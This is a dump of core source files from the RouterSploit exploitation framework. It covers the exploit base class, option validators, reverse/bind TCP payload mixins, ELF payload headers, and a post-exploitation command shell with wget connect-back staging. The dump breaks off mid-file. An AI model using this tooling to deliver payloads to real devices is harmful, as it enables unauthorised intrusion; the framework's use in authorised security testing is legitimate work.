CUSTOM = \"custom\"\n TCP = \"custom/tcp\"\n UDP = \"custom/udp\"\n FTP = \"ftp\"\n FTPS = \"ftps\"\n SSH = \"ssh\"\n TELNET = \"telnet\"\n HTTP = \"http\"\n HTTPS = \"https\"\n SNMP = \"snmp\"\n\n\nclass ExploitOptionsAggregator(type):\n \"\"\" Metaclass for exploit base class.\n\n Metaclass is aggregating all possible Attributes that user can set\n for tab completion purposes.\n \"\"\"\n\n def __new__(cls, name, bases, attrs):\n try:\n base_exploit_attributes = chain([base.exploit_attributes for base in bases])\n except AttributeError:\n attrs[\"exploit_attributes\"] = {}\n else:\n attrs[\"exploit_attributes\"] = {k: v for d in base_exploit_attributes for k, v in d.items()}\n\n for key, value in attrs.copy().items():\n if isinstance(value, Option):\n value.label = key\n attrs[\"exploit_attributes\"].update({key: [value.display_value, value.description, value.advanced]})\n elif key == \"__info__\":\n attrs[\"_{}{}\".format(name, key)] = value\n del attrs[key]\n elif key in attrs[\"exploit_attributes\"]: # removing exploit_attribtue that was overwritten\n del attrs[\"exploit_attributes\"][key] # in the child and is not an Option() instance\n\n return super(ExploitOptionsAggregator, cls).__new__(cls, name, bases, attrs)\n\n\nclass BaseExploit(metaclass=ExploitOptionsAggregator):\n @property\n def options(self):\n \"\"\" Returns list of options that user can set.\n\n Returns list of options aggregated by\n ExploitionOptionsAggegator metaclass that user can set.\n\n :return: list of options that user can set\n \"\"\"\n\n return list(self.exploit_attributes.keys())\n\n def __str__(self):\n return self.__module__.split('.', 2).pop().replace('.', os.sep)\n\n\nclass Exploit(BaseExploit):\n \"\"\" Base class for exploits \"\"\"\n\n target_protocol = Protocol.CUSTOM\n\n def run(self):\n raise NotImplementedError(\"You have to define your own 'run' method.\")\n\n def check(self):\n raise NotImplementedError(\"You have to define your own 'check' method.\")\n\n def run_threads(self, threads_number: int, target_function: any, *args, **kwargs) -> None:\n \"\"\" Run function across specified number of threads\n\n :param int thread_number: number of threads that should be executed\n :param func target_function: function that should be executed accross specified number of threads\n :param any args: args passed to target_function\n :param any kwargs: kwargs passed to target function\n :return None\n \"\"\"\n\n threads = []\n threads_running = threading.Event()\n threads_running.set()\n\n for thread_id in range(int(threads_number)):\n thread = threading.Thread(\n target=target_function,\n args=chain((threads_running,), args),\n kwargs=kwargs,\n name=f\"thread-{thread_id}\",\n )\n threads.append(thread)\n\n # print_status(\"{} thread is starting...\".format(thread.name))\n thread.start()\n\n start = time.time()\n try:\n while thread.is_alive():\n thread.join(1)\n\n except KeyboardInterrupt:\n threads_running.clear()\n\n for thread in threads:\n thread.join()\n # print_status(\"{} thread is terminated.\".format(thread.name))\n\n print_status(\"Elapsed time: {0:.4f} seconds\".format(round(time.time() - start, 2)))\n\n\ndef multi(fn):\n \"\"\" Decorator for exploit.Exploit class\n\n Decorator that allows to feed exploit using text file containing\n multiple targets definition. Decorated function will be executed\n as many times as there is targets in the feed file.\n\n WARNING:\n Important thing to remember is fact that decorator will\n supress values returned by decorated function. Since method that\n perform attack is not supposed to return anything this is not a problem.\n\n \"\"\"\n\n @wraps(fn)\n def wrapper(self, *args, **kwargs):\n if self.target.startswith(\"file://\"):\n original_target = self.target\n original_port = self.port\n\n _, _, feed_path = self.target.partition(\"file://\")\n try:\n with open(feed_path) as file_handler:\n for target in file_handler:\n target = target.strip()\n if not target:\n continue\n\n self.target, _, port = target.partition(\":\")\n if port:\n self.port = port\n else:\n self.port = original_port\n\n fn(self, *args, **kwargs)\n self.target = original_target\n self.port = original_port\n return # Nothing to return, ran multiple times\n\n except IOError:\n return\n else:\n return fn(self, *args, **kwargs)\n\n return wrapper\n\n\nclass DummyFile(object):\n \"\"\" Mocking file object. Optimilization for the \"mute\" decorator. \"\"\"\n def write(self, x):\n pass\n\n\ndef mute(fn):\n \"\"\" Suppress function from printing to sys.stdout \"\"\"\n\n @wraps(fn)\n def wrapper(self, *args, **kwargs):\n thread_output_stream.setdefault(threading.current_thread(), []).append(DummyFile())\n try:\n return fn(self, *args, **kwargs)\n finally:\n thread_output_stream[threading.current_thread()].pop()\n return wrapper\n\n\nclass LockedIterator:\n def __init__(self, it):\n self.lock = threading.Lock()\n self.it = it.__iter__()\n\n def __iter__(self):\n return self\n\n def next(self):\n self.lock.acquire()\n try:\n item = next(self.it)\n\n if isinstance(item, tuple):\n return (item[0].strip(), item[1].strip())\n elif isinstance(item, str):\n return item.strip()\n\n return item\n finally:\n self.lock.release()\n" }, { "path": "routersploit/core/exploit/option.py", "content": "import re\nimport os.path\n\nfrom routersploit.core.exploit.exceptions import OptionValidationError\nfrom routersploit.core.exploit.utils import (\n is_ipv4,\n is_ipv6,\n)\n\n\n# pylint: disable=no-member\nclass Option:\n \"\"\" Exploit attribute that is set by the end user \"\"\"\n\n def __init__(self, default, description=\"\", advanced=False):\n self.label = None\n self.description = description\n\n try:\n self.advanced = bool(advanced)\n except ValueError:\n raise OptionValidationError(\"Invalid value. Cannot cast '{}' to boolean.\".format(advanced))\n\n if default or default == 0:\n self.__set__(\"\", default)\n else:\n self.display_value = \"\"\n self.value = \"\"\n\n def __get__(self, instance, owner):\n return self.value\n\n\nclass OptIP(Option):\n \"\"\" Option IP attribute \"\"\"\n\n def __set__(self, instance, value):\n if not value or is_ipv4(value) or is_ipv6(value):\n self.value = self.display_value = value\n else:\n raise OptionValidationError(\"Invalid address. Provided address is not valid IPv4 or IPv6 address.\")\n\n\nclass OptPort(Option):\n \"\"\" Option Port attribute \"\"\"\n\n def __set__(self, instance, value):\n try:\n value = int(value)\n\n if 0 < value <= 65535: # max port number is 65535\n self.display_value = str(value)\n self.value = value\n else:\n raise OptionValidationError(\"Invalid option. Port value should be between 0 and 65536.\")\n except ValueError:\n raise OptionValidationError(\"Invalid option. Cannot cast '{}' to integer.\".format(value))\n\n\nclass OptBool(Option):\n \"\"\" Option Bool attribute \"\"\"\n\n def __init__(self, default, description=\"\", advanced=False):\n self.description = description\n\n if default:\n self.display_value = \"true\"\n else:\n self.display_value = \"false\"\n\n self.value = default\n\n try:\n self.advanced = bool(advanced)\n except ValueError:\n raise OptionValidationError(\"Invalid value. Cannot cast '{}' to boolean.\".format(advanced))\n\n def __set__(self, instance, value):\n if value == \"true\":\n self.value = True\n self.display_value = value\n elif value == \"false\":\n self.value = False\n self.display_value = value\n else:\n raise OptionValidationError(\"Invalid value. It should be true or false.\")\n\n\nclass OptInteger(Option):\n \"\"\" Option Integer attribute \"\"\"\n\n def __set__(self, instance, value):\n try:\n self.display_value = str(value)\n self.value = int(value)\n except ValueError:\n try:\n self.value = int(value, 16)\n except ValueError:\n raise OptionValidationError(\"Invalid option. Cannot cast '{}' to integer.\".format(value))\n\n\nclass OptFloat(Option):\n \"\"\" Option Float attribute \"\"\"\n\n def __set__(self, instance, value):\n try:\n self.display_value = str(value)\n self.value = float(value)\n except ValueError:\n raise OptionValidationError(\"Invalid option. Cannot cast '{}' to float.\".format(value))\n\n\nclass OptString(Option):\n \"\"\" Option String attribute \"\"\"\n\n def __set__(self, instance, value):\n try:\n self.value = self.display_value = str(value)\n except ValueError:\n raise OptionValidationError(\"Invalid option. Cannot cast '{}' to string.\".format(value))\n\n\nclass OptMAC(Option):\n \"\"\" Option MAC attribute \"\"\"\n\n def __set__(self, instance, value):\n regexp = r\"^[a-f\\d]{1,2}:[a-f\\d]{1,2}:[a-f\\d]{1,2}:[a-f\\d]{1,2}:[a-f\\d]{1,2}:[a-f\\d]{1,2}$\"\n if re.match(regexp, value.lower()):\n self.value = self.display_value = value\n else:\n raise OptionValidationError(\"Invalid option. '{}' is not a valid MAC address\".format(value))\n\n\nclass OptWordlist(Option):\n \"\"\" Option Wordlist attribute \"\"\"\n\n def __get__(self, instance, owner):\n if self.display_value.startswith(\"file://\"):\n path = self.display_value.replace(\"file://\", \"\")\n with open(path, \"r\") as f:\n lines = [line.strip() for line in f.readlines()]\n return lines\n\n return self.display_value.split(\",\")\n\n def __set__(self, instance, value):\n if value.startswith(\"file://\"):\n path = value.replace(\"file://\", \"\")\n if not os.path.exists(path):\n raise OptionValidationError(\"File '{}' does not exist.\".format(path))\n\n self.value = self.display_value = value\n\n\nclass OptEncoder(Option):\n \"\"\" Option Encoder attribute \"\"\"\n\n def __init__(self, default, description=\"\", advanced=False):\n self.description = description\n\n if default:\n self.display_value = default\n self.value = default\n else:\n self.display_value = \"\"\n self.value = None\n\n try:\n self.advanced = bool(advanced)\n except ValueError:\n raise OptionValidationError(\"Invalid value. Cannot cast '{}' to boolean.\".format(advanced))\n\n def __set__(self, instance, value):\n encoder = instance.get_encoder(value)\n\n if encoder:\n self.value = encoder\n self.display_value = value\n else:\n raise OptionValidationError(\"Encoder not available. Check available encoders with `show encoders`.\")\n" }, { "path": "routersploit/core/exploit/payloads.py", "content": "import importlib\nfrom collections import namedtuple\nfrom struct import pack\n\nfrom routersploit.core.exploit.exploit import (\n BaseExploit,\n ExploitOptionsAggregator,\n)\nfrom routersploit.core.exploit.option import (\n OptIP,\n OptPort,\n OptString,\n)\nfrom routersploit.core.exploit.exceptions import OptionValidationError\nfrom routersploit.core.exploit.printer import (\n print_status,\n print_error,\n print_success,\n print_info,\n)\n\nfrom routersploit.core.exploit.utils import (\n index_modules,\n random_text,\n)\n\n\narchitectures = namedtuple(\"ArchitectureType\", [\"ARMLE\", \"MIPSBE\", \"MIPSLE\", \"X86\", \"X64\", \"PERL\", \"PHP\", \"PYTHON\"])\nArchitectures = architectures(\n ARMLE=\"armle\",\n MIPSBE=\"mipsbe\",\n MIPSLE=\"mipsle\",\n X86=\"x86\",\n X64=\"x64\",\n PERL=\"perl\",\n PHP=\"php\",\n PYTHON=\"python\",\n)\n\npayload_handlers = namedtuple(\"PayloadHandlers\", [\"BIND_TCP\", \"REVERSE_TCP\"])\nPayloadHandlers = payload_handlers(\n BIND_TCP=\"bind_tcp\",\n REVERSE_TCP=\"reverse_tcp\",\n)\n\nARCH_ELF_HEADERS = {\n Architectures.ARMLE: (\n b\"\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n b\"\\x02\\x00\\x28\\x00\\x01\\x00\\x00\\x00\\x54\\x80\\x00\\x00\\x34\\x00\\x00\\x00\"\n b\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x34\\x00\\x20\\x00\\x01\\x00\\x00\\x00\"\n b\"\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80\\x00\\x00\"\n b\"\\x00\\x80\\x00\\x00\\xef\\xbe\\xad\\xde\\xef\\xbe\\xad\\xde\\x07\\x00\\x00\\x00\"\n b\"\\x00\\x10\\x00\\x00\"\n ),\n Architectures.MIPSBE: (\n b\"\\x7f\\x45\\x4c\\x46\\x01\\x02\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n b\"\\x00\\x02\\x00\\x08\\x00\\x00\\x00\\x01\\x00\\x40\\x00\\x54\\x00\\x00\\x00\\x34\"\n b\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x34\\x00\\x20\\x00\\x01\\x00\\x00\"\n b\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x40\\x00\\x00\"\n b\"\\x00\\x40\\x00\\x00\\xde\\xad\\xbe\\xef\\xde\\xad\\xbe\\xef\\x00\\x00\\x00\\x07\"\n b\"\\x00\\x00\\x10\\x00\"\n ),\n Architectures.MIPSLE: (\n b\"\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n b\"\\x02\\x00\\x08\\x00\\x01\\x00\\x00\\x00\\x54\\x00\\x40\\x00\\x34\\x00\\x00\\x00\"\n b\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x34\\x00\\x20\\x00\\x01\\x00\\x00\\x00\"\n b\"\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x40\\x00\"\n b\"\\x00\\x00\\x40\\x00\\xef\\xbe\\xad\\xde\\xef\\xbe\\xad\\xde\\x07\\x00\\x00\\x00\"\n b\"\\x00\\x10\\x00\\x00\"\n ),\n Architectures.X86: (\n b\"\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n b\"\\x02\\x00\\x03\\x00\\x01\\x00\\x00\\x00\\x54\\x80\\x04\\x08\\x34\\x00\\x00\\x00\"\n b\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x34\\x00\\x20\\x00\\x01\\x00\\x00\\x00\"\n b\"\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80\\x04\\x08\"\n b\"\\x00\\x80\\x04\\x08\\xef\\xbe\\xad\\xde\\xef\\xbe\\xad\\xde\\x07\\x00\\x00\\x00\"\n b\"\\x00\\x10\\x00\\x00\"\n ),\n Architectures.X64: (\n b\"\\x7f\\x45\\x4c\\x46\\x02\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n b\"\\x02\\x00\\x3e\\x00\\x01\\x00\\x00\\x00\\x78\\x00\\x40\\x00\\x00\\x00\\x00\\x00\"\n b\"\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n b\"\\x00\\x00\\x00\\x00\\x40\\x00\\x38\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n b\"\\x01\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n b\"\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\x00\"\n b\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"\n b\"\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\"\n )\n}\n\n\nclass ReverseTCPPayloadMixin(metaclass=ExploitOptionsAggregator):\n handler = PayloadHandlers.REVERSE_TCP\n lhost = OptIP('', 'Connect-back IP address')\n lport = OptPort(5555, 'Connect-back TCP Port')\n\n\nclass BindTCPPayloadMixin(metaclass=ExploitOptionsAggregator):\n handler = PayloadHandlers.BIND_TCP\n rport = OptPort(5555, 'Bind Port')\n\n\nclass BasePayload(BaseExploit):\n architecture = None\n handler = None\n encoder = OptString(\"\", \"Encoder\")\n fmt = None\n\n def __init__(self):\n if self.handler not in PayloadHandlers:\n raise OptionValidationError(\n \"Please use one of valid payload handlers: {}\".format(\n PayloadHandlers._fields\n )\n )\n\n def generate(self):\n raise NotImplementedError(\"Please implement 'generate()' method\")\n\n def run(self):\n raise NotImplementedError()\n\n def get_encoders(self):\n encoders = []\n\n # get all encoders for given architecture\n all_encoders = [e for e in index_modules() if \"encoders.{}\".format(self.architecture) in e]\n\n for e in all_encoders:\n encoder = e.replace(\"encoders.{}.\".format(self.architecture), \"\").replace(\".\", \"/\")\n module = getattr(importlib.import_module('routersploit.modules.' + e), \"Encoder\")\n encoders.append((\n \"{}/{}\".format(self.architecture, encoder),\n module._Encoder__info__[\"name\"],\n module._Encoder__info__[\"description\"],\n ))\n\n return encoders\n\n def get_encoder(self, encoder):\n module_path = \"routersploit/modules/encoders/{}\".format(encoder).replace(\"/\", \".\")\n\n try:\n module = getattr(importlib.import_module(module_path), \"Encoder\")\n except ImportError:\n return None\n\n return module()\n\n\nclass ArchitectureSpecificPayload(BasePayload):\n output = OptString(\"python\", \"Output type: elf/c/python\")\n filepath = OptString(\"/tmp/{}\".format(random_text(8)), \"Output file to write\")\n\n def __init__(self):\n super(ArchitectureSpecificPayload, self).__init__()\n if self.architecture not in Architectures:\n raise OptionValidationError(\n \"Please use one of valid payload architectures: {}\".format(\n Architectures._fields\n )\n )\n\n self.header = ARCH_ELF_HEADERS[self.architecture]\n self.bigendian = True if self.architecture.endswith(\"be\") else False\n\n def run(self):\n print_status(\"Generating payload\")\n try:\n data = self.generate()\n except OptionValidationError as e:\n print_error(e)\n return\n\n if self.output == \"elf\":\n with open(self.filepath, \"wb+\") as f:\n print_status(\"Building ELF payload\")\n content = self.generate_elf(data)\n print_success(\"Saving file {}\".format(self.filepath))\n f.write(content)\n elif self.output == \"c\":\n print_success(\"Bulding payload for C\")\n content = self.generate_c(data)\n print_info(content)\n elif self.output == \"python\":\n print_success(\"Building payload for python\")\n content = self.generate_python(data)\n print_info(content)\n else:\n raise OptionValidationError(\n \"No such option as {}\".format(self.output)\n )\n\n return content\n\n def generate_elf(self, data):\n elf = self.header + data\n\n if elf[4] == 1: # ELFCLASS32 - 32 bit\n if self.bigendian:\n p_filesz = pack(\">L\", len(elf))\n p_memsz = pack(\">L\", len(elf) + len(data))\n else:\n p_filesz = pack(\"Q\", len(elf))\n p_memsz = pack(\">Q\", len(elf) + len(data))\n else:\n p_filesz = pack(\" None:\n \"\"\" Print error message prefixing it with [-]\n\n \"\"\"\n\n __cprint(\"\\033[91m[-]\\033[0m\", *args, **kwargs)\n\n\ndef print_status(*args, **kwargs) -> None:\n \"\"\" Print status message prefixing it with [-]\n\n \"\"\"\n\n __cprint(\"\\033[94m[*]\\033[0m\", *args, **kwargs)\n\n\ndef print_success(*args, **kwargs) -> None:\n \"\"\" Print success message prefixing it with [-]\n\n \"\"\"\n\n __cprint(\"\\033[92m[+]\\033[0m\", *args, **kwargs)\n\n\ndef print_info(*args, **kwargs) -> None:\n \"\"\" Print info message prefixing it with [-]\n\n \"\"\"\n\n __cprint(*args, **kwargs)\n\n\ndef print_table(headers, *args, **kwargs) -> None:\n \"\"\" Print table.\n\n example:\n\n Name Current setting Description\n ---- --------------- -----------\n option_name value description\n foo bar baz\n foo bar baz\n\n :param headers: Headers names ex.('Name, 'Current setting', 'Description')\n :param args: table values, each element representing one line ex. ('option_name', 'value', 'description), ...\n :param kwargs: 'extra_fill' space between columns, 'header_separator' character to separate headers from content\n :return:\n \"\"\"\n extra_fill = kwargs.get(\"extra_fill\", 5)\n header_separator = kwargs.get(\"header_separator\", \"-\")\n\n if not all(map(lambda x: len(x) == len(headers), args)):\n print_error(\"Headers and table rows tuples should be the same length.\")\n return\n\n def custom_len(x):\n try:\n return len(x)\n except TypeError:\n return 0\n\n fill = []\n headers_line = ' '\n headers_separator_line = ' '\n for idx, header in enumerate(headers):\n column = [custom_len(arg[idx]) for arg in args]\n column.append(len(header))\n\n current_line_fill = max(column) + extra_fill\n fill.append(current_line_fill)\n headers_line = \"\".join((headers_line, \"{header:<{fill}}\".format(header=header, fill=current_line_fill)))\n headers_separator_line = \"\".join((\n headers_separator_line,\n \"{:<{}}\".format(header_separator * len(header), current_line_fill)\n ))\n\n print_info()\n print_info(headers_line)\n print_info(headers_separator_line)\n for arg in args:\n content_line = \" \"\n for idx, element in enumerate(arg):\n content_line = \"\".join((\n content_line,\n \"{:<{}}\".format(str(element), fill[idx])\n ))\n print_info(content_line)\n\n print_info()\n\n\ndef pprint_dict_in_order(dictionary, order=None) -> None:\n \"\"\" Pretty dict print.\n\n Pretty printing dictionary in specific order. (as in 'show info' command)\n Keys not mentioned in *order* parameter will be printed in random order.\n\n ex. pprint_dict_in_order({'name': John, 'sex': 'male', \"hobby\": [\"rugby\", \"golf\"]}, ('sex', 'name'))\n\n Sex:\n male\n\n Name:\n John\n\n Hobby:\n - rugby\n - golf\n\n \"\"\"\n order = order or ()\n\n def prettyprint(title, body):\n print_info(\"\\n{}:\".format(title.capitalize()))\n if not isinstance(body, str):\n for value_element in body:\n print_info(\"- \", value_element)\n else:\n print_info(body)\n\n keys = list(dictionary.keys())\n for element in order:\n try:\n key = keys.pop(keys.index(element))\n value = dictionary[key]\n except (KeyError, ValueError):\n pass\n else:\n prettyprint(element, value)\n\n for rest_keys in keys:\n prettyprint(rest_keys, dictionary[rest_keys])\n\n\ndef color_blue(string: str) -> str:\n \"\"\" Returns string colored with blue\n\n :param str string:\n :return str:\n \"\"\"\n\n return \"\\033[94m{}\\033[0m\".format(string)\n\n\ndef color_green(string: str) -> str:\n \"\"\" Returns string colored with green\n\n :param str string:\n :return str:\n \"\"\"\n\n return \"\\033[92m{}\\033[0m\".format(string)\n\n\ndef color_red(string: str) -> str:\n \"\"\" Returns string colored with red\n\n :param str string:\n :return str:\n \"\"\"\n\n return \"\\033[91m{}\\033[0m\".format(string)\n" }, { "path": "routersploit/core/exploit/shell.py", "content": "try:\n import telnetlib\nexcept ImportError:\n import telnetlib3 as telnetlib\n\nimport socket\nimport binascii\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nimport threading\nimport time\nimport importlib\n\nfrom routersploit.core.exploit.printer import (\n printer_queue,\n print_info,\n print_error,\n print_success,\n print_status,\n print_table,\n)\n\nfrom routersploit.core.exploit.utils import (\n index_modules,\n random_text,\n)\n\n\ndef shell(exploit, architecture=\"\", method=\"\", payloads=None, **params):\n available_payloads = {}\n payload = None\n options = []\n\n if architecture and method:\n # get all payloads for given architecture\n all_payloads = [p.replace(\"payloads.\", \"\").replace(\".\", \"/\") for p in index_modules() if \"payloads.{}\".format(architecture) in p]\n\n for p in all_payloads:\n module = getattr(importlib.import_module(\"routersploit.modules.payloads.\" + p.replace(\"/\", \".\")), \"Payload\")\n\n # if method/arch is cmd then filter out payloads\n if method == \"cmd\":\n if getattr(module, \"cmd\") in payloads:\n available_payloads[p] = module\n else:\n available_payloads[p] = module\n\n print_info()\n print_success(\"Welcome to cmd. Commands are sent to the target via the execute method.\")\n print_status(\"For further exploitation use 'show payloads' and 'set payload ' commands.\")\n print_info()\n\n while True:\n while not printer_queue.empty():\n pass\n\n if payload is None:\n cmd_str = \"\\001\\033[4m\\002cmd\\001\\033[0m\\002 > \"\n else:\n cmd_str = \"\\001\\033[4m\\002cmd\\001\\033[0m\\002 (\\033[94m{}\\033[0m) > \".format(payload._Payload__info__[\"name\"])\n\n cmd = input(cmd_str)\n\n if cmd in [\"quit\", \"exit\"]:\n return\n\n elif cmd == \"show payloads\":\n if not available_payloads:\n print_error(\"There are no available payloads for this exploit\")\n continue\n\n print_status(\"Available payloads:\")\n headers = (\"Payload\", \"Name\", \"Description\")\n data = []\n for p, v in available_payloads.items():\n data.append((p, v._Payload__info__[\"name\"], v._Payload__info__[\"description\"]))\n\n print_table(headers, *data)\n\n elif cmd.startswith(\"set payload \"):\n if not available_payloads:\n print_error(\"There are no available payloads for this exploit\")\n continue\n\n c = cmd.split(\" \")\n\n if c[2] in available_payloads.keys():\n payload = available_payloads[c[2]]()\n\n options = []\n for option, attr in payload.exploit_attributes.items():\n if option not in [\"output\", \"filepath\"]:\n options.append([option, getattr(payload, option), attr[1]])\n\n if payload.handler == \"bind_tcp\":\n options.append([\"rhost\", exploit.target, \"Target IP address\"])\n\n if method == \"wget\":\n options.append([\"lhost\", \"\", \"Connect-back IP address for wget\"])\n options.append([\"lport\", 4545, \"Connect-back Port for wget\"])\n else:\n print_error(\"Payload not available\")\n\n elif payload is not None:\n if cmd == \"show options\":\n headers = (\"Name\", \"Current settings\", \"Description\")\n\n print_info('\\nPayload Options:')\n print_table(headers, *options)\n print_info()\n\n elif cmd.startswith(\"set \"):\n c = cmd.split(\" \")\n if len(c) != 3:\n print_error(\"set